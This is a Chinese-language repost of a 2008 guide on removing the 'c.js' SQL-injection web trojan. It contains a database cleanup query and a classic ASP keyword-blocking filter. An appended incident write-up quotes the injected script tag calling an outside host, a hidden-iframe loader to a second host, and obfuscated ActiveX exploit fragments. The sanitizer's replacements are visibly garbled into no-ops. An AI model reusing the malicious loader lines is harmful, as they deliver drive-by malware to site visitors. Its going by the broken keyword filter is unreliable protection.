|
SQL注入问题,com/css/c.js病毒的清除方法。
最近流行的病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>
现已找到解决办法。
暂时清除的办法可以使用如下命令:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),’病毒代码段’,’’)
如下我写的一段标准的:
update hezu set Xiaoqm=replace(cast(Xiaoqm as varchar(8000)),' <Script
Src=http://c.nu%63%6Cear3.com/css/c.js> </Script>','')
这个可以回车换行后,多条一起执行的。
在查询分析器中执行即可。
直接的清除方法,需要在CONN.ASP中加入:
如下代码:
保证你不再被入侵。
复制内容到剪贴板代码:
<%
function tabConvert(str)
dim tempstr
dim theStr
dim canConvert
dim theChr
tempStr=str
theChr=""
theStr=""
canConvert=1
for i=1 to len(tempStr)
theChr=mid(tempStr,i,1)
if theChr=" <" then
canConvert=0
end if
if theChr=">" then
canConvert=1
end if
if theChr=" " and canConvert=1 then
theChr= " "
end if
theStr=theStr&theChr
next
theStr=replace(theStr,chr(13)," <br>")
tabConvert=theStr
End function
%>
<%
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx
Fy_Cl = 3 '
Fy_Zx = "http://www.1jia.cc" '
On Error Resume Next
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x) <>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"and") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select") <>0 or Instr
(LCase(Request(Fy_Cs(Fy_x))),"update") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"chr") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from") <>0 or
Instr(LCase(Request(Fy_Cs(Fy_x))),";") <>0 or Instr(LCase(Request(Fy_Cs
(Fy_x))),"insert") <>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid") <>0 or Instr
(LCase(Request(Fy_Cs(Fy_x))),"master.") <>0 Then
Select Case Fy_Cl
Case "1"
Response.Write " <Script Language=JavaScript>alert(' oh "&Fy_Cs(Fy_x)&" wrong!\n\n
please not:and,select,update,insert,delete,chr !\n\nNot SQL,go
out!');window.close(); </Script>"
Case "2"
Response.Write " <Script Language=JavaScript>location.href='"&Fy_Zx&"' </Script>"
Case "3"
Response.Write " <Script Language=JavaScript>alert(' go out!go out "&Fy_Cs(Fy_x)
&"go out!\n\n go out:,and,select,update,insert,delete,chr go out!\n\ngo
out!');location.href='"&Fy_Zx&"'; </Script>"
End Select
Response.End
End If
End If
Next
%>
<%
Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, -1, 1)
Str = Replace(Str," <"," <", 1, -1, 1)
Str = Replace(Str,">",">", 1, -1, 1)
Str = Replace(Str, "script", "script", 1, -1, 0)
Str = Replace(Str, "SCRIPT", "SCRIPT", 1, -1, 0)
Str = Replace(Str, "Script", "Script", 1, -1, 0)
Str = Replace(Str, "script", "Script", 1, -1, 1)
Str = Replace(Str, "object", "object", 1, -1, 0)
Str = Replace(Str, "OBJECT", "OBJECT", 1, -1, 0)
Str = Replace(Str, "Object", "Object", 1, -1, 0)
Str = Replace(Str, "object", "Object", 1, -1, 1)
Str = Replace(Str, "applet", "applet", 1, -1, 0)
Str = Replace(Str, "APPLET", "APPLET", 1, -1, 0)
Str = Replace(Str, "Applet", "Applet", 1, -1, 0)
Str = Replace(Str, "applet", "Applet", 1, -1, 1)
Str = Replace(Str, "[", "[")
Str = Replace(Str, "]", "]")
Str = Replace(Str, """", "", 1, -1, 1)
Str = Replace(Str, "=", "=", 1, -1, 1)
Str = Replace(Str, "'", "''", 1, -1, 1)
Str = Replace(Str, "select", "select", 1, -1, 1)
Str = Replace(Str, "execute", "execute", 1, -1, 1)
Str = Replace(Str, "exec", "exec", 1, -1, 1)
Str = Replace(Str, "join", "join", 1, -1, 1)
Str = Replace(Str, "union", "union", 1, -1, 1)
Str = Replace(Str, "where", "where", 1, -1, 1)
Str = Replace(Str, "insert", "insert", 1, -1, 1)
Str = Replace(Str, "delete", "delete", 1, -1, 1)
Str = Replace(Str, "update", "update", 1, -1, 1)
Str = Replace(Str, "like", "like", 1, -1, 1)
Str = Replace(Str, "drop", "drop", 1, -1, 1)
Str = Replace(Str, "create", "create", 1, -1, 1)
Str = Replace(Str, "rename", "rename", 1, -1, 1)
Str = Replace(Str, "count", "count", 1, -1, 1)
Str = Replace(Str, "chr", "chr", 1, -1, 1)
Str = Replace(Str, "mid", "mid", 1, -1, 1)
Str = Replace(Str, "truncate", "truncate", 1, -1, 1)
Str = Replace(Str, "nchar", "nchar", 1, -1, 1)
Str = Replace(Str, "char", "char", 1, -1, 1)
Str = Replace(Str, "alter", "alter", 1, -1, 1)
Str = Replace(Str, "cast", "cast", 1, -1, 1)
Str = Replace(Str, "exists", "exists", 1, -1, 1)
Str = Replace(Str,Chr(13)," <br>", 1, -1, 1)
CheckStr = Replace(Str,"'","''", 1, -1, 1)
End Function
%>
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2008-12-15/42707.html
附:
该木马利用搜索引擎检索站点漏洞,并进行自动传播。几天内,数万站点遭受感染,其中hongxiu.com、msn中国、东方财经网等都被入侵。
某日早上,某网站维护人员小任像往常一样打开了网站首页,随手点击了一个链接,想验证一下网站是否可以正常访问,没想到居然触发了防病毒的软件的报警:“发现恶意软件”。心细的小任在一查之下大吃了一惊:首页的几乎所有链接都被加上了一个奇怪的网址“http://c.nuclear3.com/css/c.js”,而这个js脚本,就是触发防病毒软件报警的元凶。
攻击者的手法很快,小任就得到了启明星辰工程师的反馈信息,在网站的/down.asp页面下,存在一个反射式的XSS漏洞,骇客就是利用这个漏洞,通过cookie 注入的方式,将恶意脚本“<Script Src=http://c.nu%63%6Cear3.com/css/c.js></script> ”注入到每一个网站链接中,以达到危害用户的目的。
小知识:什么叫反射式XSS?
Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
在这个例子里,骇客将恶意脚本嵌入URL,网站访问者一旦点击这个链接,浏览器将认为恶意代码是来自网站,从而“放心”的执行。
小知识:cookie注入
Cookie注入是SQL注入攻击的一种表现形式,是系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量没有过滤,而且在防注入程序中没有限制Request.cookie所导致的。
一个典型的例子就是javascript:alert(document.cookie="id="+escape(XX and "attack string")。 斩断注入黑手
了解了问题的根源,剩下的就是防御问题了。在启明星辰工程师的协助下,通过安星远程网站安全检查服务,小任挨个清除了页面上所挂木马,同时还发现网站存在数个SQL注入和XSS漏洞,而原有的网站安全检查代码由于无法进行语义一级的还原①,无法彻底杜绝这两类攻击,只有通过部署相应安全产品解决。 注①:继续拿/css/c.js木马举例,该木马的注入代码是http://c.nuclear3.com/css/c.js,但这个.js脚本并不是真正的攻击代码,而只是一段代码:
document.write("<iframe src='http://fvgit.cn/01/index.htm' width='100' height='0'></iframe>");
这个脚本文件会在一个隐藏的框体中引用有害的链接:'http://fvgit.cn/01/index.htm,真正的攻击代码存在于这个链接处,这段攻击代码异常简单,摈弃了头标签体标签,直接就是攻击代码,且采用了替换躲避手法: var ll=new ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");} rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "ERP" + "Ctl.1"; 这种替换躲避手法需要使用到语义还原,如果仅检查关键字,是无法发现和抵御此类攻击的  |
